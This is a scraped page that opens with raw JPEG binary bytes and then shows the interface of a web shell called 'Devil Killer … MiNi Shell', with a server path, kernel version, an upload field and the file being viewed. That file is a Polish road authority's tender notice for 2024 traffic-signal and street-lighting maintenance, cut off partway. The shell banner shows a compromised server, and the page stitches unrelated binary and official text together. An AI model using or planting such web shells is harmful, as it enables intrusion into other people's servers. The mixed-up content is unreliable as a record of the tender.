JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231228/0057621601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi konserwacji sygnalizacji świetlnych, znaków aktywnych i oświetlenia ulicznego w ciągu dróg wojewódzkich w roku 2024. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Wojewódzkich w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019170</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohdana Dobrzańskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-262</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dw.pulawy@zdw.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdw.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ogólne usługi publiczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi konserwacji sygnalizacji świetlnych, znaków aktywnych i oświetlenia ulicznego w ciągu dróg wojewódzkich w roku 2024. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b74cbbd5-a575-11ee-953e-c2ea26915e21</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00576216</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00090039/33/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.58 RDW w Puławach Usługi konserwacji sygnalizacji świetlnych, znaków aktywnych i oświetlenia ulicznego w ciągu dróg wojewódzkich</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdw-lublin.logintrade.net/zapytania_email,152327,7d8420b1ceeff480005af9c09f307acf.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji<br/>elektronicznej<br/>w rozumieniu art. 2 pkt 5) ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną (t. j. Dz. z 2020, poz. 344 ze zm.), tj.<br/>a) elektronicznej Platformy Zamówień Publicznych Zarządu Dróg Wojewódzkich w Lublinie pod<br/>adresem: https://zdw-lublin.logintrade.net (dalej zwana: „Platformą&#34;), do której dostęp<br/>możliwy jest również poprzez stronę internetową Zamawiającego wskazaną w pkt I SWZ.<br/>19<br/>b) niniejsze postępowanie znajduje się w wykazie postępowań prowadzonych przez<br/>Zamawiającego zamieszczonym na Platformie:<br/>https://zdw-lublin.logintrade.net/rejestracja/ustawowe.html.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>Oferta oraz oświadczenia o których mowa w IX .1 SWZ składa się, pod rygorem nieważności, w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, podpisem<br/>osobistym lub kwalifikowanym podpisem elektronicznym. W przypadku jeżeli Wykonawca<br/>składa ofertę oraz w/w oświadczenia w formie elektronicznej (tj. opatrzone kwalifikowanym<br/>podpisem elektronicznym, Zamawiający zaleca podpis w formacie PAdES (używany do<br/>podpisywania plików w formacie pdf.) wewnątrz podpisywanego pliku, natomiast dokumenty w<br/>formacie innym niż „pdf&#34; zaleca się podpisywać formatem XAdES. Ilekroć w Specyfikacji Warunków Zamówienia lub w przepisach o zamówieniach publicznych<br/>mowa jest o stronie internetowej należy przez to rozumieć Platformę.<br/>Postępowania zakupowe prowadzone są przy użyciu środków komunikacji elektronicznej.<br/>Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy<br/>Przetargowej Zarządu Dróg Wojewódzkich w Lublinie https://zdw-lublin.logintrade.net/. Do<br/>połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy<br/>pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych<br/>przez Internet. Wykonawca posiadający konto na Platformie Przetargowej Zarządu Dróg<br/>Wojewódzkich w Lublinie: ma dostęp do możliwości złożenia, zmiany, wycofania oferty, a także<br/>funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z<br/>Zamawiającym w pozostałych obszarach.<br/>Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych<br/>kopii dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy<br/>Przetargowej Zarządu Dróg Wojewódzkich w Lublinie:<br/>a) Dopuszczalne przeglądarki internetowe: Internet Explorer 10 i nowsze, Edge, Google<br/>Chrome, Mozilla Firefox, Opera<br/>b) Pozostałe wymagania techniczne: dostęp do sieci Internet, obsługa przez przeglądarkę<br/>protokołu XMLHttpRequest - ajax, włączona obsługa JavaScript, zalecana szybkość łącza<br/>internetowego powyżej 500 KB/s, zainstalowany Acrobat Reader, zainstalowane środowisko<br/>uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy<br/>c) W przypadku aukcji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe:<br/>dla Windows Vista: Internet Explorer 8, Internet Explorer 9, dla Windows 7: Internet Explorer<br/>9, Internet Explorer 11, dla Windows 8: Internet Explorer 11, dla Windows 10: Internet<br/>Explorer 11<br/>d) Instrukcje składania ofert środkiem komunikacji elektronicznej w postępowaniach dostępne<br/>są na stronie https://zdw- lublin.logintrade.net/rejestracja/instrukcje.html w zakładce<br/>INSTRUKCJE.<br/>W razie problemów należy korzystać ze wsparcia technicznego dla Wykonawców: Helpdesk<br/>Logintrade +48 71 787 35 34, helpdesk@logintrade.net dostępnego w dniach<br/>poniedziałek-piątek, godz. 8:00-16:00.<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z Platformy Przetargowej, w szczególności za sytuację, gdy Zamawiający zapozna<br/>się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce<br/>„Korespondencja&#34;). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony<br/>obowiązek narzucony w art. 221 ustawy Prawo zamówień publicznych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">R6.ST.372.82.2023.sj</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa konserwacji sygnalizacji świetlnych, znaków aktywnych oraz oświetlenia ulicznego w<br/>ciągu dróg wojewódzkich Nr: 738, 801, 824, 830, 874 i dawnej drogi krajowej Nr 17<br/>Zamówienie obejmuje utrzymanie w należytym stanie technicznym i ciągłej sprawności,<br/>poprzez wykonywanie przeglądów, konserwacji oraz napraw sygnalizacji świetlnych, znaków<br/>aktywnych oraz oświetlenia ulicznego. Szczegółowy zakres usług oraz ilość i lokalizacja<br/>urządzeń objętych przedmiotem zamówienia zostały określone w Opisie Przedmiotu<br/>Zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50232200-2 - Usługi w zakresie konserwacji sygnalizacji ulicznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34996000-5 - Drogowe urządzenia kontrolne, bezpieczeństwa lub sygnalizacyjne</p> <p class="mb-0">50232100-1 - Usługi w zakresie konserwacji oświetlenia ulicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa konserwacji znaków aktywnych i oświetlenia ulicznego w ciągu drogi wojewódzkiej Nr<br/>747 administrowanej przez RDW w Puławach wraz z oświetleniem drogowym na moście przez<br/>rz. Wisłę w m. Kamień<br/>Zamówienie obejmuje utrzymanie w należytym stanie technicznym i ciągłej sprawności, poprzez<br/>wykonywanie przeglądów, konserwacji oraz napraw znaków aktywnych i oświetlenia ulicznego.<br/>Szczegółowy zakres usług oraz ilość i lokalizacja urządzeń objętych przedmiotem zamówienia<br/>zostały określone w Opisie Przedmiotu Zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50232200-2 - Usługi w zakresie konserwacji sygnalizacji ulicznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34996000-5 - Drogowe urządzenia kontrolne, bezpieczeństwa lub sygnalizacyjne</p> <p class="mb-0">50232100-1 - Usługi w zakresie konserwacji oświetlenia ulicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa konserwacji znaków aktywnych i oświetlenia ulicznego w ciągu dróg wojewódzkich Nr<br/>857 i 878 oraz w ciągu dawnej drogi krajowej Nr 19 administrowanych przez RDW w Puławach<br/>Zamówienie obejmuje utrzymanie w należytym stanie technicznym i ciągłej sprawności, poprzez<br/>wykonywanie przeglądów, konserwacji oraz napraw znaków aktywnych i oświetlenia ulicznego.<br/>Szczegółowy zakres usług oraz ilość i lokalizacja urządzeń objętych przedmiotem zamówienia<br/>zostały określone w Opisie Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50232200-2 - Usługi w zakresie konserwacji sygnalizacji ulicznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34996000-5 - Drogowe urządzenia kontrolne, bezpieczeństwa lub sygnalizacyjne</p> <p class="mb-0">50232100-1 - Usługi w zakresie konserwacji oświetlenia ulicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla zadania nr 1<br/>1) Doświadczenia Wykonawcy:<br/>jeżeli wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, minimum 1 usługę polegającą na<br/>utrzymaniu sygnalizacji świetlnych, lamp oświetleniowych lub znaków aktywnych przez okres<br/>minimum jednego roku wykonanej należycie.<br/>2) Kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia:<br/>a.) Dysponowanie co najmniej 2 osobami posiadającą aktualne zaświadczenie<br/>kwalifikacyjne SEP w zakresie eksploatacji i dozoru.<br/>b.) Dysponowanie co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji<br/>urządzeń elektrycznych i elektroenergetycznych<br/>3) Dysponowanie następującym potencjałem technicznym do realizacji zamówienia<br/>Rodzaj sprzętu Wymagana ilość sprzętu<br/>Tablica zamykająca typu U-26 (na przyczepce lub na<br/>samochodzie) ze znakiem C-9/C-10 min. 1<br/>Podnośnik koszowy tzw. zwyżka 1<br/>Dla zadania nr 2<br/>1) Doświadczenia Wykonawcy:<br/>jeżeli wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, minimum 1 usługę polegającą na<br/>utrzymaniu lamp oświetleniowych lub znaków aktywnych przez okres minimum jednego roku<br/>wykonanej należycie.<br/>2) Kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia:<br/>a.) Dysponowanie co najmniej 2 osobami posiadającą aktualne zaświadczenie kwalifikacyjne SEP<br/>w zakresie eksploatacji i dozoru.<br/>b.) Dysponowanie co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji<br/>urządzeń elektrycznych i elektroenergetycznych<br/>3) Dysponowanie następującym potencjałem technicznym do realizacji zamówienia<br/>Rodzaj sprzętu Wymagana ilość sprzętu<br/>Tablica zamykająca typu U-26 (na przyczepce lub na<br/>samochodzie) ze znakiem C-9/C-10 min. 1<br/>Podnośnik koszowy tzw. zwyżka 1<br/>Dla zadania nr 3<br/>1) Doświadczenia Wykonawcy:<br/>jeżeli wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, minimum 1 usługę polegającą na<br/>utrzymaniu lamp oświetleniowych lub znaków aktywnych przez okres minimum jednego roku<br/>wykonanej należycie.<br/>2) Kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia:<br/>a.) Dysponowanie co najmniej 2 osobami posiadającą aktualne zaświadczenie kwalifikacyjne SEP<br/>w zakresie eksploatacji i dozoru.<br/>b.) Dysponowanie co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji<br/>urządzeń elektrycznych i elektroenergetycznych<br/>3) Dysponowanie następującym potencjałem technicznym do realizacji zamówienia<br/>Rodzaj sprzętu Wymagana ilość sprzętu<br/>Tablica zamykająca typu U-26 (na przyczepce lub na<br/>samochodzie) ze znakiem C-9/C-10 min. 1<br/>Podnośnik koszowy tzw. zwyżka 1 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej.<br/>2. Zamawiający zgodnie z art. 455 ustawy PZP przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdw-lublin.logintrade.net/zapytania,str2.html?rodzaj=ustawowe&amp;widok=kreator&amp;id_zapytanie=152327</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-08 